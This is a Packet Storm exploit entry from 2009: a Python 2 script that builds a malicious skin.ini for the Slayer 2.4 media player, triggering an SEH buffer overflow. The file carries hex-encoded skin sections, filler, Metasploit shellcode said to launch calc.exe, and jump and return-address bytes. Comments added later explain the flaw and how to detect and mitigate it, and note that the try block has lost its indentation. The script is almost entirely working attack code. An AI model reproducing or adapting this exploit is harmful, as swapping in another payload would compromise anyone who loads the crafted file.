Slayer 2.4 Buffer Overflow

2009-05-27T00:00:00
ID PACKETSTORM:77821
Type packetstorm
Reporter SuNHouSe2
Modified 2009-05-27T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
# Proof-of-concept generator for a crafted Slayer 2.4 "skin.ini" (SEH overflow,
# Packet Storm 77821, 2009). Running it writes one local file and nothing else;
# there is no network activity. Defensive notes: the artifact is a skin.ini whose
# [BUTTONINFO] "1=" entry carries a name field several hundred bytes long
# (see the payload assembly below) -- an easily detectable anomaly in a file
# that is otherwise short plain text. The underlying weakness is the absence of
# length validation on that field in the skin parser; mitigation is to fix that
# validation and not to load skins from untrusted sources. Per the Metasploit
# comment on the shellcode, the embedded payload only launches calc.exe.
# Python 2 only (print statements, raw_input).
print "**************************************************************************"  
print "[~]Slayer v2.4 (skin) Universal Seh Overflow Exploit (SEH)\n"  
print "[~]AUTHOR: SuNHouSe2 [ALGERIAN HaCkEr]\n"  
print "[~]Email : sunhouse2@yahoo.com\n"  
print "[~]HOME : http://www.snakespc.com\n"   
print "[~]Tested on: Windows XP Pro SP3 (FR)\n"  
print "[~]Special ThanX : His0k4,& ALL Snakespc.com Members\n"  
print "**************************************************************************"   
  
import os  
  
# header1 decodes to the start of a plain-text skin.ini: a [SCREEN] section
# with image paths (Mask=../abd/mask.bmp, Main=../abd/main.jpg, ...), then
# "[BUTTONINFO]\n1=". The oversized value appended after it is the field that
# overflows.
header1=(  
"\x5b\x53\x43\x52\x45\x45\x4e\x5d\x0a\x4d\x61\x73\x6b\x3d\x2e\x2e\x2f\x61\x62\x64"  
"\x2f\x6d\x61\x73\x6b\x2e\x62\x6d\x70\x0a\x4d\x61\x69\x6e\x3d\x2e\x2e\x2f\x61\x62"  
"\x64\x2f\x6d\x61\x69\x6e\x2e\x6a\x70\x67\x0a\x44\x6f\x77\x6e\x3d\x2e\x2e\x2f\x61"  
"\x62\x64\x2f\x53\x65\x6c\x65\x63\x74\x65\x64\x2e\x6a\x70\x67\x0a\x4f\x76\x65\x72"  
"\x3d\x2e\x2e\x2f\x61\x62\x64\x2f\x4f\x76\x65\x72\x2e\x6a\x70\x67\x0a\x44\x69\x73"  
"\x61\x62\x6c\x65\x64\x3d\x2e\x2e\x2f\x61\x62\x64\x2f\x6d\x61\x69\x6e\x2e\x6a\x70"  
"\x67\x0a\x0a\x5b\x42\x55\x54\x54\x4f\x4e\x49\x4e\x46\x4f\x5d\x0a\x31\x3d")  
  
# header2 decodes to the remainder of a well-formed skin.ini. It starts with
# ",324,76,24,16,Configuration,FALSE" -- the rest of entry 1 -- so the overflow
# sits entirely in entry 1's first (name) field. It then lists entries 2..12 of
# [BUTTONINFO] (B_VOB, B_PLAYLIST, B_MUTE, ..., B_PLAY, each as
# id,geometry,label,FALSE), followed by [PROGRESSINFO] and [TEXTINFO] sections.
header2=(  
"\x2c\x33\x32\x34\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x43\x6f\x6e\x66\x69\x67"  
"\x75\x72\x61\x74\x69\x6f\x6e\x2c\x46\x41\x4c\x53\x45\x0a\x32\x3d\x42\x5f\x56\x4f"  
"\x42\x2c\x32\x39\x2c\x33\x31\x2c\x31\x34\x2c\x31\x35\x2c\x4c\x61\x6e\x67\x75\x61"  
"\x67\x65\x20\x53\x65\x6c\x65\x63\x74\x69\x6f\x6e\x2c\x46\x41\x4c\x53\x45\x0a\x33"  
"\x3d\x42\x5f\x50\x4c\x41\x59\x4c\x49\x53\x54\x2c\x37\x30\x2c\x34\x39\x2c\x31\x34"  
"\x2c\x31\x35\x2c\x50\x6c\x61\x79\x6c\x69\x73\x74\x2c\x46\x41\x4c\x53\x45\x0a\x34"  
"\x3d\x42\x5f\x4d\x55\x54\x45\x2c\x36\x34\x2c\x37\x35\x2c\x31\x34\x2c\x31\x35\x2c"  
"\x4d\x75\x74\x65\x2c\x46\x41\x4c\x53\x45\x0a\x35\x3d\x42\x5f\x46\x55\x4c\x4c\x53"  
"\x43\x52\x45\x45\x4e\x2c\x37\x32\x2c\x32\x36\x2c\x31\x34\x2c\x31\x35\x2c\x46\x75"  
"\x6c\x6c\x73\x63\x72\x65\x65\x6e\x2c\x46\x41\x4c\x53\x45\x0a\x36\x3d\x42\x5f\x41"  
"\x42\x4f\x55\x54\x2c\x33\x34\x2c\x38\x36\x2c\x31\x33\x2c\x31\x33\x2c\x41\x62\x6f"  
"\x75\x74\x2c\x46\x41\x4c\x53\x45\x0a\x37\x3d\x42\x5f\x4f\x50\x45\x4e\x2c\x32\x39"  
"\x39\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x4f\x70\x65\x6e\x2c\x46\x41\x4c\x53"  
"\x45\x0a\x38\x3d\x42\x5f\x43\x4c\x4f\x53\x45\x2c\x34\x32\x33\x2c\x35\x2c\x31\x32"  
"\x2c\x31\x30\x2c\x43\x6c\x6f\x73\x65\x2c\x46\x41\x4c\x53\x45\x0a\x39\x3d\x42\x5f"  
"\x50\x52\x45\x56\x2c\x32\x34\x39\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x50\x72"  
"\x65\x76\x69\x6f\x75\x73\x20\x43\x6c\x69\x70\x2c\x46\x41\x4c\x53\x45\x0a\x31\x30"  
"\x3d\x42\x5f\x4e\x45\x58\x54\x2c\x32\x37\x34\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36"  
"\x2c\x4e\x65\x78\x74\x20\x43\x6c\x69\x70\x2c\x46\x41\x4c\x53\x45\x0a\x31\x31\x3d"  
"\x42\x5f\x53\x54\x4f\x50\x2c\x32\x32\x34\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c"  
"\x53\x74\x6f\x70\x2c\x46\x41\x4c\x53\x45\x0a\x31\x32\x3d\x42\x5f\x50\x4c\x41\x59"  
"\x2c\x31\x39\x39\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x50\x6c\x61\x79\x2c\x46"  
"\x41\x4c\x53\x45\x0a\x0a\x5b\x50\x52\x4f\x47\x52\x45\x53\x53\x49\x4e\x46\x4f\x5d"  
"\x0a\x31\x3d\x50\x52\x4f\x47\x52\x45\x53\x53\x5f\x50\x4f\x53\x2c\x2c\x31\x34\x39"  
"\x2c\x37\x30\x2c\x32\x34\x34\x2c\x34\x2c\x56\x0a\x0a\x5b\x54\x45\x58\x54\x49\x4e"  
"\x46\x4f\x5d\x0a\x31\x3d\x54\x45\x58\x54\x5f\x53\x4c\x41\x59\x45\x52\x2c\x41\x72"  
"\x69\x61\x6c\x2c\x54\x52\x55\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x33\x2c\x38\x33"  
"\x38\x38\x36\x30\x38\x2c\x31\x36\x30\x2c\x32\x35\x2c\x38\x30\x2c\x31\x35\x2c\x0a"  
"\x32\x3d\x54\x45\x58\x54\x5f\x43\x4c\x49\x50\x5f\x4e\x41\x4d\x45\x2c\x41\x72\x69"  
"\x61\x6c\x2c\x46\x41\x4c\x53\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x31\x36"  
"\x37\x31\x31\x36\x38\x30\x2c\x31\x36\x31\x2c\x34\x30\x2c\x32\x31\x38\x2c\x31\x35"  
"\x2c\x0a\x33\x3d\x54\x45\x58\x54\x5f\x50\x4f\x53\x2c\x41\x72\x69\x61\x6c\x2c\x46"  
"\x41\x4c\x53\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x31\x36\x37\x31\x31\x36"  
"\x38\x30\x2c\x32\x34\x30\x2c\x32\x35\x2c\x31\x36\x30\x2c\x31\x35\x2c\x0a\x34\x3d"  
"\x54\x45\x58\x54\x5f\x43\x4c\x49\x50\x5f\x49\x4e\x46\x4f\x2c\x41\x72\x69\x61\x6c"  
"\x2c\x46\x41\x4c\x53\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x31\x36\x37\x31"  
"\x31\x36\x38\x30\x2c\x31\x36\x31\x2c\x35\x35\x2c\x35\x30\x2c\x31\x35\x2c\x0a\x35"  
"\x3d\x54\x45\x58\x54\x5f\x54\x49\x50\x2c\x41\x72\x69\x61\x6c\x2c\x46\x41\x4c\x53"  
"\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x32\x35\x35\x2c\x33\x30\x30\x2c\x35"  
"\x35\x2c\x35\x30\x2c\x31\x35\x2c\x0a")  
  
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com  
# Opaque, encoder-wrapped Metasploit payload; the comment above is the only
# record of its origin and effect (launches calc). Treat it as data -- it is
# not decoded or executed by this script, only written into the file.
shellcode=(  
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1e"  
"\xc7\xd0\x3c\x83\xeb\xfc\xe2\xf4\xe2\x2f\x94\x3c\x1e\xc7\x5b\x79"  
"\x22\x4c\xac\x39\x66\xc6\x3f\xb7\x51\xdf\x5b\x63\x3e\xc6\x3b\x75"  
"\x95\xf3\x5b\x3d\xf0\xf6\x10\xa5\xb2\x43\x10\x48\x19\x06\x1a\x31"  
"\x1f\x05\x3b\xc8\x25\x93\xf4\x38\x6b\x22\x5b\x63\x3a\xc6\x3b\x5a"  
"\x95\xcb\x9b\xb7\x41\xdb\xd1\xd7\x95\xdb\x5b\x3d\xf5\x4e\x8c\x18"  
"\x1a\x04\xe1\xfc\x7a\x4c\x90\x0c\x9b\x07\xa8\x30\x95\x87\xdc\xb7"  
"\x6e\xdb\x7d\xb7\x76\xcf\x3b\x35\x95\x47\x60\x3c\x1e\xc7\x5b\x54"  
"\x22\x98\xe1\xca\x7e\x91\x59\xc4\x9d\x07\xab\x6c\x76\x37\x5a\x38"  
"\x41\xaf\x48\xc2\x94\xc9\x87\xc3\xf9\xa4\xb1\x50\x7d\xc7\xd0\x3c")  
  
# Assemble the file: well-formed prefix, then the oversized entry-1 name field
# (348 bytes of 'A' filler + shellcode, then the jump/NOP/address constants
# that make this an SEH overwrite), then the well-formed remainder. The
# resulting skin.ini line is hundreds of bytes long where a legitimate one
# is a few dozen -- that length is the detection signal for this file.
payload = header1  
payload += "\x41"*(348-len(shellcode))  
payload += shellcode  
payload += "\xE9\x5B\xFF\xFF\xFF"  
payload += "\x90"*15  
payload += "\xEB\xEA\xFF\xFF"  
payload += "\x50\x37\x40"  
payload += header2  
# NOTE: the lines inside try/except below carry no indentation in this copy;
# kept as found.
try:  
os.mkdir("sunhouse")  # raises OSError if the directory already exists (e.g. a second run); the bare except below hides that
out_file = open(r'SuNHouSe/skin.ini', 'w')  # different case from the mkdir path; resolves to the same directory only on a case-insensitive filesystem (the stated Windows target)
out_file.write(payload)  
out_file.close()  
raw_input("\nExploit file created!\n")  
except:  
print "Error"  # bare except: any failure (mkdir, open, write, or a KeyboardInterrupt at the prompt) is reported only as "Error" with no detail
  
  
`